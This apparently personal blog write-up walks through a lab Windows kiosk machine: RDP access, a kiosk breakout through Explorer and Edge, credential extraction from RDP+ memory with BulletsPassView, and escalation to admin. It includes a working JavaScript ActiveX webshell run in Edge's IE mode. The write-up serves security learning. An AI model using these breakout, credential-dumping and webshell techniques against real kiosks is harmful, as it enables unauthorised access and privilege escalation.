Vulnlab - VulnEscape Writeup

Liam Geyer
  2026-06-06 2026-06-06 Created   2026-06-07 23:05:14 2026-06-07 23:05:14 Updated   

๐Ÿ‘พ Machine Overview

This is a writeup of the machine VulnEscape from VulnLab (now HTB), itโ€™s an easy difficulty Windows machine thatโ€™s focused on Kiosk breakouts. This box was a lot of fun; had real-world applications to engagements that Iโ€™ve been on, and I enjoyed how unique it was.

๐Ÿ” Enumeration

An initial scan of the host gave the following results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
naabu -host 10.129.234.51

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

		projectdiscovery.io

[INF] Current naabu version 2.3.7 (outdated)
[WRN] UI Dashboard is disabled, Use -dashboard option to enable
[INF] Running CONNECT scan with non root privileges
10.129.234.51:3389
[INF] Found 1 ports on host 10.129.234.51 (10.129.234.51)

Only RDP is open.

๐Ÿ’ฅ Breakout

When we hit the machine over RDP, itโ€™s accessible without credentials.

RDP Login Prompt

After clicking OK weโ€™re granted access to Windows in kiosk mode as KioskUser0.

Kiosk Background

Weโ€™re greeted with just a background, we canโ€™t use Win+R, and thereโ€™s no taskbar.

Windows kiosk mode is typically used to build restricted user experiences for machines that are meant to be publicly accessible, with limited functionality. This is used in workflows like hotel checkin kiosks, or restaurant ordering kiosks.

There are two main kiosk modes: single-app, and restricted user experience. A single-app kiosk runs a single app in full-screen, when the kiosk account signs in the app launches automatically. With assigned access, this can be used to launch an app above the lockscreen. The other main kiosk mode is restricted user experience where users are provided a restricted desktop environment.

It looks like weโ€™re in a restricted user experience kiosk. Playing around with different key combinations I was able to use Ctrl+N / Ctrl+O to open windows explorer. I found this great blog about kiosk breakouts with edge that was very helpful during this box.

Launching edge with explorer

With explorer open, we can type msedge.exe in the filebar to open Edge. The first thing I did was change the language to English at edge://settings/languages.

Now that I could read, I started poking around the filesystem to try and find the flag, or any kind of secret that could lead us to something of interest. Typing file:// into the URL bar lets us use edge to browse the filesystem, evading the typical controls seen in Explorer. Sometimes, you can use edge to launch a command prompt, but I was unable to get that to work here.

I was able to nab the flag from KioskUser0โ€™s desktop.

User Flag

๐Ÿ‘€ RDP+

Poking around the filesystem, I found an interesting C:\_admin directory accessible to our user which contained an XML profile for Remote Desktop Plus.

RDP+ Profile

My first thought was to try and load the file into RDP+ to see if itโ€™ll allow us to view the credentials. If unsuccessful we can try viewing the credentials in memory using something like BulletsPassView, or reversing the app to determine how credentials are encrypted.

Viewing the profile in RDP+

RDP+ does redact credentials in the app, but I was able to pull them from memory with BulletsPassView.

Extracting credentials with BulletsPassView

This gives us the credentials for the admin user, but I wasnโ€™t able to use them to login with RDP.

๐Ÿ–ฅ Code Execution as Admin

Since we canโ€™t login over RDP as admin, my next thought was to try and start a runas. I used one of the techniques outlined in NVISO Labsโ€™ blog to get code execution through edge. They outline a method to enable IE explorer mode in edge, and create a webshell with JavaScript.

First I had to go to edge://settings/defaultBrowser and enable internet explorer compatibility for foo.html, where Iโ€™ll save my payload.

Enabling IE Mode

Next I browsed to the edge homepage, opened up the developer console, and changed the HTML to the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<script>
    function shlExec() {
        var cmd = document.getElementById('cmd').value
        var shell = new ActiveXObject("WScript.Shell");
        try {
            var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");
        } catch (e) {
            console.log(e);
        }
 
        var cmdStdOut = execOut.StdOut;
        var out = cmdStdOut.ReadAll();
        alert(out);
    }
</script>
 
<form onsubmit="shlExec()">
    Command: <input id="cmd" name="cmd" type="text">
    <input type="submit">
</form>

Then, I used Ctrl+S to save the file as C:\Users\KioskUser0\Downloads\foo.html, which was set to use IE compatibility mode in Edge.

Browsing to the page, we have to click through some popups to allow blocked content, but it works as a shell:

Executing commands with the webshell

I used this to launch a new PowerShell window as the kiosk user, then I used runas /user:admin powershell.exe to start a new process as the admin user.

Admin shell

This worked, but we werenโ€™t in a high-integrity/admin process, so I ran Start-Process powershell -Verb RunAs to allow us to nab the flag.

Grabbing the admin flag

Yippee!

๐Ÿ“– Resources

๐Ÿ”— Hyperlinkโ„น๏ธ Info
Microsoft LearnWindows Kiosk Mode Docs
NVISO LabsWindows Kiosk Breakout Blog
My Notes :)Kiosk Breakout Notes
  • Title: Vulnlab - VulnEscape Writeup
  • Author: Liam Geyer
  • Created at : 2026-06-06 00:00:00
  • Updated at : 2026-06-07 23:05:14
  • Link: https://lfgberg.org/2026/06/06/vulnlab/vulnescape/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Vulnlab - VulnEscape Writeup
  1. ๐Ÿ‘พ Machine Overview
  2. ๐Ÿ” Enumeration
  3. ๐Ÿ’ฅ Breakout
  4. ๐Ÿ‘€ RDP+
  5. ๐Ÿ–ฅ Code Execution as Admin
  6. ๐Ÿ“– Resources